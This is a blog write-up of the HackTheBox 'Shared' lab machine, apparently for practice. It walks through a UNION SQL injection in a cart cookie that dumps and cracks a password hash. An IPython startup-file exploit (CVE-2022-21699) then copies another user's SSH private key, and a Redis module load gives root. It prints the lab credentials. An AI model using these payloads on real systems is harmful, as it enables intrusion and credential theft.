<!doctype html><html lang=en><head><title>Shared write-up (HackTheBox) · HOME</title><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><meta name=color-scheme content="light dark"><meta name=author content="Khaled Ngm"><meta name=description content="Faculty write-up HackTheBox Link to heading 1. Port Scanning and Enumuration Link to heading 2. Exploitation Link to heading 3. Privilege Escalation Link to heading USER Link to heading ROOT Link to heading Port Scan (Nmap) Link to heading First We will scan target with nmap nmap -sV -sC 10.10.11.172 I found two open ports ssh and http Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-29 08:14 EDT Nmap scan report for 10."><meta name=keywords content="Red Team ,blog,pentester,penetration testesr,hacking"><meta name=twitter:card content="summary"><meta name=twitter:title content="Shared write-up (HackTheBox)"><meta name=twitter:description content="Faculty write-up HackTheBox Link to heading 1. Port Scanning and Enumuration Link to heading 2. Exploitation Link to heading 3. Privilege Escalation Link to heading USER Link to heading ROOT Link to heading Port Scan (Nmap) Link to heading First We will scan target with nmap nmap -sV -sC 10.10.11.172 I found two open ports ssh and http Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-29 08:14 EDT Nmap scan report for 10."><meta property="og:title" content="Shared write-up (HackTheBox)"><meta property="og:description" content="Faculty write-up HackTheBox Link to heading 1. Port Scanning and Enumuration Link to heading 2. Exploitation Link to heading 3. Privilege Escalation Link to heading USER Link to heading ROOT Link to heading Port Scan (Nmap) Link to heading First We will scan target with nmap nmap -sV -sC 10.10.11.172 I found two open ports ssh and http Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-29 08:14 EDT Nmap scan report for 10."><meta property="og:type" content="article"><meta property="og:url" content="https://khaledngm11.github.io/posts/shared/"><meta property="article:section" content="posts"><meta property="article:published_time" content="2022-10-29T00:00:00+00:00"><meta property="article:modified_time" content="2022-10-29T00:00:00+00:00"><link rel=canonical href=https://khaledngm11.github.io/posts/shared/><link rel=preload href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as=font type=font/woff2 crossorigin><link rel=stylesheet href=/css/coder.min.c4d7e93a158eda5a65b3df343745d2092a0a1e2170feeec909b8a89443903c6a.css integrity="sha256-xNfpOhWO2lpls980N0XSCSoKHiFw/u7JCbiolEOQPGo=" crossorigin=anonymous media=screen><link rel=stylesheet href=/css/coder-dark.min.39e41a7f16bdf8cb16e43cae7d714fa1016f1d2d2898a5b3f27f42c9979204e2.css integrity="sha256-OeQafxa9+MsW5DyufXFPoQFvHS0omKWz8n9CyZeSBOI=" crossorigin=anonymous media=screen><link rel=icon type=image/png href=/images/favicon-32x32.png sizes=32x32><link rel=icon type=image/png href=/images/favicon-16x16.png sizes=16x16><link rel=apple-touch-icon href=/images/apple-touch-icon.png><link rel=apple-touch-icon sizes=180x180 href=/images/apple-touch-icon.png><link rel=manifest href=/site.webmanifest><link rel=mask-icon href=/images/safari-pinned-tab.svg color=#5bbad5><meta name=generator content="Hugo 0.105.0"></head><body class="preload-transitions colorscheme-auto"><div class=float-container><a id=dark-mode-toggle class=colorscheme-toggle><i class="fa fa-adjust fa-fw" aria-hidden=true></i></a></div><main class=wrapper><nav class=navigation><section class=container><a class=navigation-title href=/>HOME</a>
<input type=checkbox id=menu-toggle>
<label class="menu-button float-right" for=menu-toggle><i class="fa fa-bars fa-fw" aria-hidden=true></i></label><ul class=navigation-list><li class=navigation-item><a class=navigation-link href=/about/>About</a></li><li class=navigation-item><a class=navigation-link href=/posts/>Writeups</a></li><li class=navigation-item><a class=navigation-link href=/contact/>Contact me</a></li><li class="navigation-item menu-separator"><span>|</span></li><li class=navigation-item><a href=https://khaledngm11.github.io/pt-br/></a></li></ul></section></nav><div class=content><section class="container post"><article><header><div class=post-title><h1 class=title><a class=title-link href=https://khaledngm11.github.io/posts/shared/>Shared write-up (HackTheBox)</a></h1></div><div class=post-meta><div class=date><span class=posted-on><i class="fa fa-calendar" aria-hidden=true></i>
<time datetime=2022-10-29T00:00:00Z>October 29, 2022</time></span>
<span class=reading-time><i class="fa fa-clock-o" aria-hidden=true></i>
5-minute read</span></div></div></header><div><h1 id=faculty-write-up-hackthebox>Faculty write-up HackTheBox
<a class=heading-link href=#faculty-write-up-hackthebox><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h1><p><img src=/images/shared/shared.png alt=faculty></p><h3 id=1-port-scanning-and-enumuration>1. Port Scanning and Enumuration
<a class=heading-link href=#1-port-scanning-and-enumuration><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><h3 id=2-exploitation>2. Exploitation
<a class=heading-link href=#2-exploitation><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><h3 id=3-privilege-escalation>3. Privilege Escalation
<a class=heading-link href=#3-privilege-escalation><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><ul><li><h3 id=user>USER
<a class=heading-link href=#user><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3></li><li><h3 id=root>ROOT
<a class=heading-link href=#root><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3></li></ul><h2 id=port-scan-nmap>Port Scan (Nmap)
<a class=heading-link href=#port-scan-nmap><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li>First We will scan target with nmap <code>nmap -sV -sC 10.10.11.172</code></li><li>I found two open ports <code>ssh</code> and <code>http</code></li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-29 08:14 EDT
</span></span><span style=display:flex><span>Nmap scan report for 10.10.11.172
</span></span><span style=display:flex><span>Host is up (0.26s latency).
</span></span><span style=display:flex><span>Not shown: 997 closed tcp ports (conn-refused)
</span></span><span style=display:flex><span>PORT    STATE SERVICE  VERSION
</span></span><span style=display:flex><span>22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
</span></span><span style=display:flex><span>| ssh-hostkey: 
</span></span><span style=display:flex><span>|   3072 91:e8:35:f4:69:5f:c2:e2:0e:27:46:e2:a6:b6:d8:65 (RSA)
</span></span><span style=display:flex><span>|   256 cf:fc:c4:5d:84:fb:58:0b:be:2d:ad:35:40:9d:c3:51 (ECDSA)
</span></span><span style=display:flex><span>|_  256 a3:38:6d:75:09:64:ed:70:cf:17:49:9a:dc:12:6d:11 (ED25519)
</span></span><span style=display:flex><span>80/tcp  open  http     nginx 1.18.0
</span></span><span style=display:flex><span>|_http-server-header: nginx/1.18.0
</span></span><span style=display:flex><span>|_http-title: Did not follow redirect to http://shared.htb
</span></span><span style=display:flex><span>443/tcp open  ssl/http nginx 1.18.0
</span></span><span style=display:flex><span>|_http-title: Did not follow redirect to https://shared.htb
</span></span><span style=display:flex><span>|_ssl-date: TLS randomness does not represent time
</span></span><span style=display:flex><span>|_http-server-header: nginx/1.18.0
</span></span><span style=display:flex><span>| tls-nextprotoneg: 
</span></span><span style=display:flex><span>|   h2
</span></span><span style=display:flex><span>|_  http/1.1
</span></span><span style=display:flex><span>| ssl-cert: Subject: commonName=*.shared.htb/organizationName=HTB/stateOrProvinceName=None/countryName=US
</span></span><span style=display:flex><span>| Not valid before: 2022-03-20T13:37:14
</span></span><span style=display:flex><span>|_Not valid after:  2042-03-15T13:37:14
</span></span><span style=display:flex><span>| tls-alpn: 
</span></span><span style=display:flex><span>|   h2
</span></span><span style=display:flex><span>|_  http/1.1
</span></span><span style=display:flex><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style=display:flex><span>Nmap done: 1 IP address (1 host up) scanned in 85.55 seconds
</span></span></code></pre></div><ul><li>First of all lets add <code>shared.htb</code> to /etc/hosts file .</li><li>Then when I navigate to <code>http://shared.htb</code> and added an Item at cart and hover
at <strong>[proceed to checkout button]</strong> I found that redirect me to subdomain <code>checkout.shared.htb</code></li></ul><p><img src=/images/shared/sub.png alt=sub></p><ul><li><p>let&rsquo;s add <code>checkout.shared.htb</code> also to <code>/etc/hosts</code></p></li><li><p>When I proceeded to page I found a <strong>table</strong> that host qty and price of product.</p></li><li><p>I clicked pay but nothing happened , it shows only an static alert that payment recieved .</p></li><li><p>I opened <strong>Burp</strong> to see request and found that the QTY and Item are stored at cookie <code>custom_cart</code> parameter .
<img src=/images/shared/cart.png alt=cart></p></li><li><p>I tried change the QTY and Item and that change in table , after a few minutes I found that it&rsquo;s vulnerable to <code>sqli</code> .</p></li><li><p>We can use <code>wappalyzer extension</code> that identify the database <code>MySQL</code>.</p><p><img src=/images/shared/db.png alt=cart></p></li></ul><h2 id=exploitation>Exploitation
<a class=heading-link href=#exploitation><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><h3 id=sqli-payloads>SQLi Payloads
<a class=heading-link href=#sqli-payloads><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><ul><li><code>{"BTAPXNX4' UNION SELECT NULL-- -":"1"}</code> &#187; Nothing returned at table.</li><li><code>{"BTAPXNX4' UNION SELECT NULL,NULL-- -":"1"}</code> &#187; Nothing.</li><li><code>{"BTAPXNX4' UNION SELECT NULL,NULL,NULL-- -":"1"}</code> &#187;&#187; Returnd the Item and QTY so there are 3 columns at this table .</li></ul><h3 id=return-the-name-of-available-tables>Return The name of Available tables.
<a class=heading-link href=#return-the-name-of-available-tables><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><ul><li><p>We can retrieve table info from information_schema.tables</p></li><li><p><code>{"' UNION SELECT NULL,table_name,NULL FROM information_schema.tables -- -":"1"}</code> but that show me only one table .</p></li><li><p>let&rsquo;s use <code>group_concat()</code> to get all tables name concatanated <code>{"' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables -- -":"1"}</code> .</p><p><img src=/images/shared/sqli.png alt=sqli></p></li><li><p>As we can see , we got aa table caled <code>user</code>.</p></li></ul><h3 id=return-the-name-of-available-columns-for-user-table->Return The name of Available columns for <code>user</code> table .
<a class=heading-link href=#return-the-name-of-available-columns-for-user-table-><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><ul><li><p>We can retrieve table info from information_schema.columns</p></li><li><p><code>{"' UNION SELECT NULL,group_concat(column_name),NULL FROM information_schema.columns WHERE table_name='user'-- -":"1"}</code></p><p><img src=/images/shared/col.png alt=col></p></li><li><p><code>{"' UNION SELECT NULL,username,NULL FROM user -- -":"1"}</code> &#187; james_mason</p></li><li><p><code>{"' UNION SELECT NULL,password,NULL FROM user -- -":"1"}</code> &#187; fc895d4eddc2fc12f995e18c865cf273</p></li><li><p>I found that md5 hash was easy to crack using any online tools .</p></li><li><p>We have now <code>james_mason</code> and <code>Soleil101</code> to log into <code>ssh</code>.</p></li></ul><h2 id=privilege-escalation-user>Privilege Escalation (User)
<a class=heading-link href=#privilege-escalation-user><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li>Now we have to escalate our priveleges to <code>dan_smith</code> user to read user.txt file .</li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>ls -la
</span></span><span style=display:flex><span>total 3856
</span></span><span style=display:flex><span>drwxr-xr-x 6 james_mason james_mason    4096 Oct 30 08:51 .
</span></span><span style=display:flex><span>drwxr-xr-x 4 root        root           4096 Jul 14 13:46 ..
</span></span><span style=display:flex><span>lrwxrwxrwx 1 root        root              9 Mar 20  2022 .bash_history -&gt; /dev/null
</span></span><span style=display:flex><span>-rw-r--r-- 1 james_mason james_mason     220 Mar 20  2022 .bash_logout
</span></span><span style=display:flex><span>-rw-r--r-- 1 james_mason james_mason    3526 Mar 20  2022 .bashrc
</span></span><span style=display:flex><span>drwx------ 3 james_mason james_mason    4096 Oct 30 08:51 .gnupg
</span></span><span style=display:flex><span>drwxr-xr-x 2 james_mason james_mason    4096 Oct 28 11:42 .ipython
</span></span><span style=display:flex><span>-rw-r--r-- 1 james_mason james_mason  827827 Oct 13 16:41 linpeas.sh
</span></span><span style=display:flex><span>drwxr-xr-x 3 james_mason james_mason    4096 Oct 29 07:54 .local
</span></span><span style=display:flex><span>-rw-r--r-- 1 james_mason james_mason     807 Mar 20  2022 .profile
</span></span><span style=display:flex><span>-rwxr-xr-x 1 james_mason james_mason 3078592 Oct 28 02:15 pspy64
</span></span><span style=display:flex><span>drwx------ 2 james_mason james_mason    4096 Oct 28 11:48 .ssh
</span></span></code></pre></div><ul><li>First I used <a href="'https://github.com/DominicBreuker/pspy'">pspy64</a>.</li><li>pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute .</li><li>I found That ipython is running with <code>UID=1001</code> which belongs to developer .</li><li>Let&rsquo;s know the version of ipython using <code>ipython --version</code> &#187; 8.0.0 .</li><li>After a minutes of search I found this <a href="'https://github.com/ipython/ipython/security/advisories/GHSA-pq7m-3gw7-gq5x'">repo</a> that disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another .</li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>mkdir -m 777 /opt/scripts_review/profile_default
</span></span><span style=display:flex><span>mkdir -m 777 /opt/scripts_review/profile_default/startup
</span></span><span style=display:flex><span>echo &#34;import os;os.system(&#39;cat ~/.ssh/id_rsa &gt; /tmp/dan.key&#39;)&#34; &gt; /opt/scripts_review/profile_default/startup/run.py
</span></span></code></pre></div><p><img src=/images/shared/danKey.png alt=key></p><ul><li>Now we can login as dan_smith <code>chmod 600 dan.key; ssh -i dan.key dan_smith@shared.htb</code> .</li></ul><h2 id=privilege-escalation-root>Privilege Escalation (Root)
<a class=heading-link href=#privilege-escalation-root><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li><p>First I executed <a href=https://github.com/topics/linpeas>linpeas.sh</a> script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts .</p></li><li><p>I found a binary file that belong to root and readable by me .</p><p><img src=/images/shared/redis.png alt=redis></p></li><li><p>Befor Using <code>redis-cli</code> we have to know first <code>username</code> and <code>password</code> to authenticate .</p></li><li><p>I used String Command to try to look at an hardcoded password and I wasn&rsquo;t able to identify that , so I downloaded the file locally and executed it .</p></li><li><p><code>chmod +x redis_connector_dev ; ./redis_connector_dev</code> but I got nothing.</p></li><li><p>I started listening on <code>6379</code> port that redis hosted on and run binary again .</p><p><img src=/images/shared/auth.png alt=auth></p></li><li><p>I got password <code>F2WHqJUz2WEz=Gqq</code> and default username is <code>default</code> .</p></li><li><p>After minutes of reading about redis pentesting at <a href=https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis#load-redis-module>hacktricks</a> I found many methods to explit it .</p></li><li><p>I tried to upload php webshell via redis-cli but it failed for me .</p></li><li><p>So let&rsquo;s use <code>load redis module</code> technique .</p><p><img src=/images/shared/module.png alt=module></p></li><li><p>As we don&rsquo;t have git at our htb machine we will clone <a href=https://github.com/n0b0dyCN/RedisModules-ExecuteCommand>exploit</a> locally and transfer it to the machine <code>scp -r -i id_rsa.key /path/to/directory user@machine_b_ipaddress:/path/to/destination</code>.</p></li><li><p>Go to RedisModules-ExecuteCommand folder and run command <code>make</code>.</p></li><li><p>let&rsquo;s run redis-cli to load module .</p></li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-v data-lang=v><span style=display:flex><span>127.0.0.1:6379&gt; <span style=font-weight:700>AUTH</span> default <span style=font-weight:700>F2WHqJUz2WEz</span>=<span style=font-weight:700>Gqq</span>
</span></span><span style=display:flex><span><span style=font-weight:700>OK</span>
</span></span><span style=display:flex><span>127.0.0.1:6379&gt; <span style=font-weight:700>module</span> load /home/dan_smith/<span style=font-weight:700>RedisModules</span>-<span style=font-weight:700>ExecuteCommand</span>/src/<span style=font-weight:700>module</span>.so
</span></span><span style=display:flex><span><span style=font-weight:700>OK</span>
</span></span><span style=display:flex><span>127.0.0.1:6379&gt; system.exec <span style=font-style:italic>&#34;id&#34;</span>
</span></span><span style=display:flex><span><span style=font-style:italic>&#34;uid=0(root) gid=0(root) groups=0(root)</span><span style=font-weight:700;font-style:italic>\n</span><span style=font-style:italic>&#34;</span>
</span></span></code></pre></div><ul><li>Now we are root :)</li></ul><h2 id=resources>Resources
<a class=heading-link href=#resources><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li><a href=https://github.com/payloadbox/sql-injection-payload-list>https://github.com/payloadbox/sql-injection-payload-list</a></li><li><a href=https://github.com/topics/linpeas>https://github.com/topics/linpeas</a></li><li><a href=https://github.com/DominicBreuker/pspy>https://github.com/DominicBreuker/pspy</a></li><li><a href="https://www.cve.org/CVERecord?id=CVE-2022-21699">https://www.cve.org/CVERecord?id=CVE-2022-21699</a></li><li><a href=https://github.com/n0b0dyCN/RedisModules-ExecuteCommand>https://github.com/n0b0dyCN/RedisModules-ExecuteCommand</a></li><li><a href=https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis>https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis</a></li></ul></div><footer></footer></article></section></div><footer class=footer><section class=container>©
2022
Khaled Ngm
·
Powered by <a href=https://gohugo.io/>Hugo</a> & <a href=https://github.com/luizdepra/hugo-coder/>Coder</a>.</section></footer></main><script src=/js/coder.min.236049395dc3682fb2719640872958e12f1f24067bb09c327b233e6290c7edac.js integrity="sha256-I2BJOV3DaC+ycZZAhylY4S8fJAZ7sJwyeyM+YpDH7aw="></script></body></html>